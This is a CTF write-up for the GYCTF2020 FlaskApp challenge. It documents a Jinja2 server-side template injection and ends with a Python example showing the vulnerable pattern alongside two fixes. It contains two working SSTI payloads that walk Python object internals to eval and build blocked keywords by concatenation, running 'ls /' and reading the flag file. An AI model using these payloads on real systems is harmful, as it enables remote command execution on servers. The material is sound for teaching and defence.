[GYCTF2020]FlaskApp (template injection)

Submitting e3sxKzF9fQ== (the base64 of {{1+1}}) to the decrypt function returns 2, so the decoded input is being rendered as a template: a server-side template injection exists.

Testing shows that the keywords flag (ZmxhZyA=), import, os, eval and similar are filtered.

Lesson learned: build the filtered words by string concatenation to list the directory:

{% for c in [].__class__.__base__.__subclasses__() %}
{% if c.__name__ == 'catch_warnings' %}
  {% for b in c.__init__.__globals__.values() %}
  {% if b.__class__ == {}.__class__ %}
    {% if 'eva'+'l' in b.keys() %}
      {{ b['eva'+'l']('__impor'+'t__'+'("o'+'s")'+'.pope'+'n'+'("ls /").read()') }}
    {% endif %}
  {% endif %}
  {% endfor %}
{% endif %}
{% endfor %}

Note that this_is_the_flag.txt exists; its name also has to be concatenated to get past the filter:

{% for c in [].__class__.__base__.__subclasses__() %}
{% if c.__name__ == 'catch_warnings' %}
  {% for b in c.__init__.__globals__.values() %}
  {% if b.__class__ == {}.__class__ %}
    {% if 'eva'+'l' in b.keys() %}
      {{ b['eva'+'l']('__impor'+'t__'+'("o'+'s")'+'.pope'+'n'+'("cat /this_is_the_fl"+"ag.txt").read()') }}
    {% endif %}
  {% endif %}
  {% endfor %}
{% endif %}
{% endfor %}
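As an added example (not from the write-up, whose application code is not shown), the snippet below reconstructs the root cause the {{1+1}} probe reveals and shows the two fixes a defender would apply: never splice user text into template source, and use Jinja2's sandbox as defence in depth, which rejects the dunder attribute walk used above regardless of keyword filtering. It assumes only that jinja2 is installed; the probe string is constructed here.

```python
import base64

from jinja2 import Environment
from jinja2.sandbox import SandboxedEnvironment, SecurityError

# Constructed probe, the same idea as the write-up's e3sxKzF9fQ== ("{{1+1}}").
PROBE = base64.b64encode(b"{{1+1}}").decode()


def decrypt(b64_text: str) -> str:
    """The challenge's 'decrypt' is a plain base64 decode (assumption)."""
    return base64.b64decode(b64_text).decode("utf-8", "replace")


def render_vulnerable(b64_text: str) -> str:
    """Vulnerable pattern: decoded user text becomes part of the template
    SOURCE, so any {{ ... }} or {% ... %} inside it is executed."""
    tpl = Environment().from_string("decrypted: " + decrypt(b64_text))
    return tpl.render()


def render_safe(b64_text: str) -> str:
    """Fix 1: user text is passed as a template VARIABLE. The template source
    is a constant, so template syntax in the input is just displayed."""
    tpl = Environment(autoescape=True).from_string("decrypted: {{ text }}")
    return tpl.render(text=decrypt(b64_text))


# The object walk the write-up's payloads start from; a keyword blacklist
# (flag/import/os/eval) does not match it, and concatenation defeats the
# blacklist anyway, so the fix must be structural rather than lexical.
SUBCLASS_WALK = "{{ [].__class__.__base__.__subclasses__() }}"


def sandbox_blocks(template_source: str) -> bool:
    """Fix 2 (defence in depth): SandboxedEnvironment refuses attributes that
    start with '_', so __class__ resolves to an unsafe Undefined and the next
    attribute access raises SecurityError. Returns True when blocked."""
    try:
        SandboxedEnvironment().from_string(template_source).render()
    except SecurityError:
        return True
    return False


if __name__ == "__main__":
    print(render_vulnerable(PROBE))        # decrypted: 2
    print(render_safe(PROBE))              # decrypted: {{1+1}}
    print(sandbox_blocks(SUBCLASS_WALK))   # True
```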
